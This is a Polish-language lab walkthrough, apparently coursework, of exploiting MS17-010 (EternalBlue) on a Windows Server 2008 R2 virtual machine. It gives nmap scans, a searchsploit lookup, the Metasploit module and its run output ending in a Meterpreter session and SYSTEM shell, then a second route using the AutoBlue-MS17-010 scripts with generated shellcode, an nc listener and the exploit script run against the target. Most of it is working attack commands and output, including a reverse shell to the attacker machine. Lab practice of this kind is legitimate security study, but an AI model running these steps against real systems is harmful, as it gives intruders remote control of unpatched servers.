**Uzycie metasploita**

Wyszukiwanie podatnosci windows 2008

`sudo nmap -sS -sV -A -T4 192.168.10.104 -oX nmapw2k.xml`

wynik:

```
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds         Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
3306/tcp  open  mysql                MySQL 5.5.20-log
```

```
Host script results:
| smb2-time: 
|   date: 2022-11-06T11:30:38
|_  start_date: 2022-11-06T07:50:43
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: **Windows Server 2008 R2** Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: victim02
|   NetBIOS computer name: VICTIM02\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-11-06T03:30:37-08:00
|_nbstat: NetBIOS name: VICTIM02, NetBIOS user: <unknown>, NetBIOS MAC: 08002740e795 (Oracle VirtualBox virtual NIC)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h19m59s, deviation: 3h15m57s, median: 0s
```
Analiza podatnosci w narzedziu searchsploit:

`searchsploit -t --www Windows Server 2008 R2 `

```
...
Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)   | https://www.exploit-db.com/exploits/10068
**Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)**                        | https://www.exploit-db.com/exploits/41987
MuPDF < 20091125231942 - 'pdf_shade4.c' Multiple Stack Buffer Overflows
...
```
wlaczamy msfconsole

wyszukujemy eternalblue

```
smsf6 > search eternalblue

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
```

`msf6 exploit(windows/smb/ms17_010_eternalblue) > show options`

ustawiamy parametry:
show options
set rhost
set lhost
set lport
set payload

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

```
...
Meterpreter session 1 opened (192.168.10.115:4444 -> 192.168.10.104:49420) at 2022-11-06 13:19:29 +0100
[+] 192.168.10.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 
```

```
meterpreter > shell
Process 3876 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
```

**Eternalblue bez metasploita**


Wyszukanie ofiary za pomoca nmapa:
`sudo nmap -sS -sV -O <ip>`

```
sudo nmap -sS -sV -O 192.168.10.104 
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-06 11:43 CET
Nmap scan report for 192.168.10.104
Host is up (0.00030s latency).
Not shown: 981 closed tcp ports (reset)
PORT      STATE SERVICE              VERSION
21/tcp    open  ftp                  Microsoft ftpd
22/tcp    open  ssh                  OpenSSH 7.1 (protocol 2.0)
80/tcp    open  http                 Microsoft IIS httpd 7.5
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
**445/tcp   open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds**
3306/tcp  open  mysql                MySQL 5.5.20-log
...
```

Klonujemy repozytorumi z githuba: https://github.com/3ndG4me/AutoBlue-MS17-010

`git clone https://github.com/3ndG4me/AutoBlue-MS17-010`

Otrzymujemy katalog: `AutoBlue-MS17-010`
przechodzimy do katalogu: shellcode

`cd shellcod`e

i uruchamiamy skrypt bashowy:

`./shell_prep.sh`

Jest to plik konfiguracyjny w ktorym podejmy:
lhost
lport (dla x86 i x64)
wybieramy rodzaj shella
oraz rodzaj payloadu

[screenshot](images/zad6_eternalblue1.png)

wynikiem tego dzialania jest utworzenie plikow binarnych m. in. sc_x64, sc_86, sc_all itp.

w terminalu 1 uruchamiamy nc:

`nc -nlvp 4444` # wpisujemy wybrany port w operacji generowania binarki

w terminalu 2 uruchamiamy skrypt pythona:

`python eternalblue_exploit7.py 192.168.10.104 shellcode/sc_x64.bin` # ip = adres ofiary dla architerktury 64-bit

wynik w/w dzialan przedstawia zrzut ekranu:

[screenshot](images/zad6_eternalblue2.png)



